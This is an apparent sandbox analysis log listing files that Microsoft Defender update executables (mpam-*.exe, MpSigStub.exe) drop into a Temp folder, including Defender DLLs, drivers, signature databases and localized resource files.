Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sq-AL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpOAV.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCopyAccelerator.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\id-ID\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\am-ET\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sk-SK\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\et-EE\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\is-IS\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gl-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hr-HR\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\DefenderCSP.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCommu.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lv-LV\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetoursCopyAccelerator.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-CA\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetoursCopyAccelerator.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-CA\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\MpEvMsg.dll.mui
